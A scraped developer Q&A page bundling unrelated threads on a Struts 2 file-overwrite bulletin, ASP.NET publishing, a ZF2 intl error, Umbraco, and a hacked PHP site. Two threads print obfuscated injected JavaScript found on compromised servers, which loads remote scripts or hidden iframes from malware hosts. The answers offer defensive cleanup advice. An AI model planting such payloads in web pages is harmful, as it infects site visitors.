Develop Reference

struts 2 bug gaining root access to server

been researching for quite sometime now (research not limited to this site only) but I have not seen any discussion on this "alleged" issue.
My friend told me that they found a critical issue in using struts 2 (2.2.1.1). Told me that a hacker can gain root access to your project's directory. hence he can modify the files in the projects.
I took less notice of it before. But just now, I experienced the same issue.
[Alleged Bug]: Been wondering why, after I deployed my project, all DOM elements whose events are triggered using javascript dont work after sometime. Further investigation, I found out that the jquery lib I uploaded to the server (used jquery-1.3.2.min.js) had been replaced (its content). The filename is the same but the content is something unrecognizable (at least to me), see below:
var _0xfcda=["\x3C\x53\x43\x52\x49\x50\x54\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x61\x64\x73\x6C\x2E\x63\x6F\x6D\x2F\x73\x70\x63\x6F\x64\x65\x2F\x63\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xfcda[1]](_0xfcda[0]);
That's when I remembered what my friend told me. Can somebody confirm if the said bug/issue is legit and explain here what it is all about and how it can be fixed. I think this is a pretty huge glitch.
NOTE: I am pretty sure that the code above is not ours. I checked my local copy, and the code is different and everything is okay in my local. Pretty sure as well that nobody else aside from me, knows the root password of the server.
NOTE: I will use the latest struts 2 release, but I think this issue, if legits, need to be discussed thoroughly as a headsup/reference to the community.

My friend told me that they found a critical issue in using struts 2
(2.2.1.1). Told me that a hacker can gain root access to your
project's directory. hence he can modify the files in the projects.
I think he was referring to one of the vulnerabilities discovered and announced on December 2011.
You can read the details in Security Bulletin S2-008.
Arbitrary File Overwrite in Struts <= 2.3.1 (ParameterInterceptor)
While accessing the flag allowStaticMethodAccess within parameters is
prohibited since Struts 2.2.3.1 an attacker can still access public
constructors with only one parameter of type String to create new Java
objects and access their setters with only one parameter of type
String. This can be abused in example to create and overwrite
arbitrary files. To inject forbidden characters into a filename an
uninitialized string property can be used.
I can't know if this is what happened to you, but it's probably what your friend was talking about.
I will use the latest struts 2 release
Then you have (almost) nothing to worry about... until the next vulnerability get discovered and disclosed, then you will need to upgrade again.
As for every software out there, always use the latest (stable) version.

VS 2012 publishing a webside 2 big problems

I am new to coding and everytime I ask a question I feel like stupid because I mostly am unfamiliar with most known things in this "industry" so I will sum up the whole situation fastly.
I learned how to code html css and js, I learned how to use VS 2012 asp.net mvc 4 and finally I made a webside for a student club I am into. Hosting is provided by our school and they only gave me ftp user name and password, I dont know which hosting firm is it or what is going on and so on, I got Filezilla to delete and unpublish the old webside, and I didnt know a proper way to publish asp.net websides through filezilla so I used VS 2012 publish tool.
I choosed FTP as publish method because I had ftp user name... I choosed relase as configuration and thats it ( I didnt open options here ) finally I could push on publish...
I faced 2 main problems so I couldnt publish
Problems I faced were;
1) While I was trying to publish I got an error like
" Validation (HTML5): Element 'a' must not be nested within element 'a button' "
I was trying to make a nav with sub items on it, It worked while I was trying it on local host I saw similar problems spoken out here on VS 2010 I tried to make exstensions to VS didnt work out
Anyway I deleted that part from the project and I tried publishing again.
2)It worked out perfect it seemed like no problem occoured. But when I try to open the webside it was saying I had no permisson to view.
I hope I didnt write any off topic staff here just try to tell you my problems so maybe someone can get help like I did from prior topics.

" Validation (HTML5): Element 'a' must not be nested within element 'a
button' "
You cannot have one anchor tag inside another anchor tag. If you have it that will cause you the problem.
Check out this thread to find out valid elements which can be nested inside an Anchor tag.
I had no permisson to view.
You need to give proper read/write permissions for the ApplicationPool Identity on the folder structure you have for your website. Or else IIS Apppool will not be able to get the files and execute them.
Give permissions to AppPool Identity for a particular folder/file. That resource will guide you one how to give you permissions to Application Pool Identity.
Alternatively you can give permissions from FileZilla itself. Simply right click the application root folder and select permissions. Then you can specify permissions from client side itself. But in most of the production cases, we have to add app pool user to the folder/file permissions list manually. But definitely give a try with FileZilla.

ZF2 Fatal error: Class 'Locale' not found in /home/...../Zend/I18n/Translator/Translator.php on line 228

I have a project in my localhost, already running, after modifying the php.ini of my XAMPP server [running on Windows 7] (adding: extension=php-intl.dll).
But when i upload this project to my GoDaddy hosting, it doesn´t works and get the following error:
Fatal error: Class 'Locale' not found in /home/content/41/9674641/html/library/zend.2.0.4/Zend/I18n/Translator/Translator.php on line 228
GoDaddy hosting details:
Php version 5.3
Operating system: Linux
i386-redhat-linux-gnu
Zend Framework details:
Zend Library: 2.0.4
I´ve tried what they say on the following links:
http://support.godaddy.com/help/article/1085/can-i-add-a-php-initialization-file-to-my-hosting-account?locale=en
http://support.godaddy.com/help/article/5647/why-isnt-my-phpini-file-taking-effect?locale=en&ci=46061
Also, i´ve called to 24/7 goDaddy support and they suggested me to create a php5.ini file in the root directory, then, they told me to stop all web services (Cpanel/Stats & Monitors/System Processes/end web), but they didn´t told me what do i need to include in the php5.ini file.
I was reading some links and, as my localhost is a windows one, adding the extension=php-intl.dll to the php.ini file worked. So i´ve tried to include in my godaddy linux server: extension=php-intl.so but doesn´t works (neither extension=php-intl.dll).
The problem with the goDaddy hosting began when i started using ZF2 FORMs.
Updates:
1) I´ve got access to the php5.ini of the goDaddy server (i have made a copy on the root of my hosting) using PUTTY: cp /web/conf/php5.ini /var/chroot/home/content/41/9674641/html
Then i have read it and i could not find the "intl" extension, instead of this, i only could find:
; Windows Extensions
; Note that ODBC support is built in, so no dll is needed for it.
; Note that many DLL files are located in the extensions/ (PHP 4) ext/ (PHP 5)
; extension folders as well as the separate PECL DLL download (PHP 5).
; Be sure to appropriately set the extension_dir directive.
;extension=php_mbstring.dll
;extension=php_bz2.dll
;extension=php_curl.dll
;extension=php_dba.dll
;extension=php_dbase.dll
;extension=php_exif.dll
;extension=php_fdf.dll
;extension=php_filepro.dll
;extension=php_gd2.dll
;extension=php_gettext.dll
;extension=php_ifx.dll
;extension=php_imap.dll
;extension=php_interbase.dll
;extension=php_ldap.dll
;extension=php_mcrypt.dll
;extension=php_mhash.dll
;extension=php_mime_magic.dll
;extension=php_ming.dll
;extension=php_mssql.dll
;extension=php_msql.dll
;extension=php_mysql.dll
;extension=php_oci8.dll
;extension=php_openssl.dll
;extension=php_oracle.dll
;extension=php_pgsql.dll
;extension=php_shmop.dll
;extension=php_snmp.dll
;extension=php_sockets.dll
;extension=php_sqlite.dll
;extension=php_sybase_ct.dll
;extension=php_tidy.dll
;extension=php_xmlrpc.dll
;extension=php_xsl.dll
2) goDaddy response to my formal support request (ticket):
Thank you for contacting Online Support
I understand you are wanting to get Internationalization extension on
to your hosting account. At this time these are not supported in our
systems at this time. We are going to review this with our developers
to more information. You may receive an email us down the road with
addition information about this.
Please let us know if we can assist you in any other way.
Now i'm thinking that i have two problems:
A) Include the line to enable the extension (i don't know how):
Maybe could be:
extension_dir=/var/chroot/home/content/41/9674641/html/library/extensions/php-intl/usr/lib64/php/modules
extension="intl.so"
B) Include the extension in some location inside my hosting (but i don´t know how):
Maybe i could put the extension files inside: /var/chroot/home/content/41/9674641/html/library/extensions/php-intl
Also, i don't know where to acquire the extension files
C) Is there any known update on ZF2 (skeleton, library ..) that solve this issue ?
Please, i need help as soon as possible.

You can manage PHP modules by using the "Change PHP version" feature of the cPanel interface. Select any version other than "native" and a list of checkboxes will appear.
http://support.godaddy.com/help/article/3937/viewing-or-changing-your-php-language-version?pc_split_value=2
Of course, their support might not immediately mention this solution, which should have been in their knowledge base in the first place.

Umbraco 6.0.3 missing content and media nodes

I have just put up an Umbraco 6.0.3 site on eHosting and set all the directory permissions iaw our.umbraco.org/.../permissions. And this(http://our.umbraco.org/wiki/reference/files-and-folders/permissions/perform-permissions-check) reports the permissions as "perfect". .NET framework set to 4.0 and App pool has been set and recycled. Site shows up but no macros load and in the Umbraco UI there is only a Content node and a Media node, both the Content and Media trees are empty.
I can't think of anything else it can be. This is the first V6 site I've put live.
Is there anything else I can check?
Cheers

Check that your user login has permissions to view those nodes. The fact that you are not seeing any other sections (Settings, Developer, etc) suggests this.
Also - are you using any hostnames in Umbraco for the site (where you right click and click manage hostnames on the content node)? If so then check that the root node has a wildcard hostname added.
This is a case of retracing your steps over what you've done. If the other options don't work then you can do a database refresh too (copy the dev database to live). The fact you can login to the admin UI, says that you have the database working. However, is it possible that you've tweaked anything manually in the database?
Are you using MVC or ASP.NET rendering engine?
Check your log files and paste them here if all else fails and we'll try and help you out as best we can. You'll find them in App_Data/Logs/UmbracoLogs.txt

When the content and media nodes failed to load for us in Umbraco 6.0.3 it was due to a bug in Courier which causes the back-office to malfunction if you are connected to a MySQL database (throws an exception complaining "Keyword not supported: 'charset'").
Courier interferes with many back office functions and in this case it is incorrectly assuming that you must be connecting to an MSSQL server.
The only solution was to uninstall Courier (which was OK for us because we'd already determined that there are too many show-stopping bugs for it to function as advertised).

Found This Hack in my web server php files

How did i get them and what can i do to avoid this in the future?
#8f4d8e#
echo "<script type=\"text/javascript\" language=\"javascript\" >ff=String;fff=\"fromCharCode\";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v=\"eval\";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0145,0163,0170,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0145,0163,0170,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0141,0142,0163,0157,0154,0165,0164,0145,0147,0151,0146,0164,056,0143,0157,0155,057,0137,0160,0162,0151,0166,0141,0164,0145,057,0143,0154,0153,056,0160,0150,0160,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0145,0163,0170,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0145,0163,0170,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+478!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>";
#/8f4d8e#

It seems to be redirecting to or injecting content from absolutegift dot com, a malware distributor. Somebody uploaded it to your server. This person (or bot) may have managed to get your password or he may have used an exploit. Change your passwords, make sure all user input (including uploads) is validated. Make sure you have a firewall running (I recommend csf) and scan your server for rootkits.

Contact your hosting provider and notify them of the issue. This is very important I've shutdown plenty of legit websites because they were compromised and the owner lost all their data.
If you are using a CMS such as Drupal, Wordpress, etc. etc. Make sure you upgrade and change admin passwords. If you have any plugins, make sure they are upgraded.
If you have no CMS, change your FTP & control panel passwords.
As for fixing the problem. If you are using a CMS, an in-place upgrade should replace all the files. If not, you can download all your files and use a word-processor like Notepad++ to do a find-and-replace throughout the directory. Also, your hosting provider might be able to restore from backup, or at least have some experience in fixing it.
To prevent it, don't use a CMS and learn some web security. Possibly hire a pentester.

this happened to me as well on an old site running Drupal 5. What I did is download the site and compared it with a clean copy of the codebase using meld (a graphical diff tool for linux).
I found that there was a file called god.php that was placed in one of the subdirectories and contained a php script which called R57. It's really scary what this thing can do.
Many of my files were infected with something like:
<?php
#8f4d8e#
...
#/8f4d8e#
?>
I cleaned this up manually a few times but kept being hacked until I removed the "god.php" file. I assume it might be called differently on your system.
If you have SSH access to the server go to your document root and search for all files containing the string:
grep -R "#8f4d8e#" .
You could also look for your version of the god.php file... look for traces of R57, for example by issuing:
grep -R "R57" .
Mine had a big ASCII art drawing of a bug at the beginning of the file.
I'm not sure how I got it but there were a list of bad things: un-updated very old version of Drupal, PHP4 with register_globals on, shared hosting (and probably a lousy company).
What I did is move the cleaned up site to another hosting company with PHP 5 and changed all passwords: drupal, ftp, mysql etc.